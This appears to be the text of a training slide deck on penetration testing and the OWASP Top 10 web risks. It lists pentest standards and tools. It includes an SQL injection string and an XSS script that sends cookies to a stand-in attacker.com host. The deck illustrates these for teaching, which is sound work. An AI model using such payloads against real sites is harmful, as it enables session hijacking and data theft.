Penetration Testing following OWASP Boyan Yanchev – Chief Technology Officer Peter Dimkov – IS Consultant
За Лирекс
“Penetration testing” A method of compromising the security of a computer system or network by simulating an attack by a malicious hacker.
Pentest Requirements by Standards PCI-DSS Requirement 11: Regularly test security systems and processes. GDPR Article 32, 1 (d) - a process for regularly testing, assessing and evaluating the effectiveness of technical and organisational measures for ensuring the security of the procssing. ISO 27001 A.12.6 – Technical vulnerability management A.9.4 – System and application access control A.11.1.4 – Protecting against external and environmental threats A.12.2 – Protection from malware A.14.2.8 – System Security Testing …..
Types of “Penetration tests” (by target scope) Vulnerability assessment Infrastructure Penetration tests Internal External WEB/Application Penetration tests Static WEB Site Dynamic content and applications Mobile application Penetration tests
Open Systems Interconnection model (OSI model) https://www.krackattacks.com/ https://www.dropbox.com/s/fexmecnnb6gg6y6/KevinMitnick_EmailHack.mp4?dl=0
Top 10 threats defined by OWASP for 2013 Open Web Application Security Project List of the Top 10 most critical WEB Application Security Risks The top 10 threats defined by OWASP for 2013 include: A1: Injection (Injection flaws, such as SQL, OS, and LDAP injection) A2: Broken Authentication and Session Management A3: Cross-Site Scripting (XSS) A4: Insecure Direct Object References A5: Security Misconfiguration A6: Sensitive Data Exposure A7: Missing Function Level Access Control A8: Cross-Site Request Forgery (CSRF) A9: Using Components with Known Vulnerabilities A10: Unvalidated Redirects and Forwards Totally free to use for personal and business use
OWASP Top 10 2017 RC2 – Released (20.10.2017) OWASP Top 10 2017 RC1 – Rejected OWASP Top 10 2017 RC2 – Released (20.10.2017) New OWASP Top 10 2017 is to be released in late November 2017
Top 10 threats defined by OWASP for 2013 Author: Alan Zeichick Principal Analyst, Camden Associates
Data can be stolen, modified, deleted A1. Injections Injection attacks occur when unvalidated input is embedded in an instruction stream Impact - SEVERE! Data can be stolen, modified, deleted Client-side controls can easily be bypassed by an attacker Related to: SQL LDAP Anything that builds up a query from a user input
SQL Injection – Illustrated (source: OWASP) Account: SKU: Account: SKU: "SELECT * FROM accounts WHERE acct=‘’ OR 1=1--’" Account Summary Acct:5424-6066-2134-4334 Acct:4128-7574-3921-0192 Acct:5424-9383-2039-4029 Acct:4128-0004-1234-0293 HTTP response DB Table HTTP request SQL query Accounts Finance Administration Transactions Communication Knowledge Mgmt E-Commerce Bus. Functions Application Layer Databases Legacy Systems Web Services Directories Human Resrcs Billing APPLICATION ATTACK Custom Code 1. Application presents a form to the attacker 2. Attacker sends an attack in the form data App Server 3. Application forwards attack to the database in a SQL query Web Server Hardened OS 4. Database runs query containing attack and sends encrypted results back to application Network Layer Firewall Firewall 5. Application decrypts data as normal and sends results to the user
Injection
A1. Injections Source: http://codecurmudgeon.com/wp/sql-injection-hall-of-shame/
A2. Broken Authentication and Session Management Hijacking a user’s session HTTP is a “stateless” protocol which means that credentials have to go with every request SESSION ID used to track state.
A2. Broken Authentication and Session Management Vulnerabilities: sessionIDs are being stored in the URL Guessable sessionIDs sessionIDs are not timing out Passwords are not stored hashed Credentials are sent over plain text
A3. Cross-Site Scripting (XSS) The most prevalent web application security flaw Enables the attacker to execute scripts in victim’s browser Used to: steal user’s session; steal sensitive data; rewrite web page (insert malicious content); redirect user to phishing or malware site Be sure to sanitize your input fields!
A3. Cross-Site Scripting (XSS) <script>alert(XSS Attack!)</script> <script>document.location= 'http://www.attacker.com/cgi-bin/cookie.cgi ?foo='+document.cookie</script>
A4. Insecure Direct Object References Accessing data or system by changing a parameter value which refers to an object that the user is not authorized to access
A7. Missing Function Level Access Control Threat: unauthorized access to functionality (Privileged escalation) Authorization checks are used in order to generate appropriate menus and/or show/hide various options If an attacker is aware of the presence of these other functions he could attempt to call them If the server does not check the permissions for this user, the privilege escalation is successful
A5. Security Misconfiguration Attack vectors: Missing (outdated) patches; Misconfigurations; Use of default accounts; Use of unnecessary services and features; Unprotected files and directories; Error messages not customized or blocked
A5. Security Misconfiguration
A6. Sensitive Data Exposure When high value data (passwords, credit card data, e-mails, etc.) is not properly handled by the application and not adequately protected on the WEB Site Data Exposure is at serious risk! Evaluate the high value data Use encryption
A8. Cross-Site Request Forgery (CSRF) An attacker can cause the victim to change their password, username, email, send private message from victim’s account, steal money, order stuff with a click of a link Most frameworks have a mechanism to protect from CSRF
A9. Using Components with Known Vulnerabilities Using things like framework libraries, plugins and such Components often run with the full privilege of the application Finding exploits for particular component (is components are not updated) Exploit the vulnerability Prevention: Write your own components Always update with the most current version
A10. Unvalidated Redirects and Forwards The possibility of a WEB application to accept an untrusted input that could cause the WEB application to redirect to the request URL, contained within the untrusted input Launching phishing scams Stealing credentials
Tools Vulnearbility Assessment tools: Metasploit Framework OpenVAS Acunetix Qualys Nessus Metasploit Framework The Pentesters Framework (PTF) Kali Linux Nmap AirCrack SQLMap Ethercap Wireshark Nikto/Wikto SiteDigger Proxies Paros Proxy OWASP ZAP Burp Suite Various Browser Plugins
Thank you!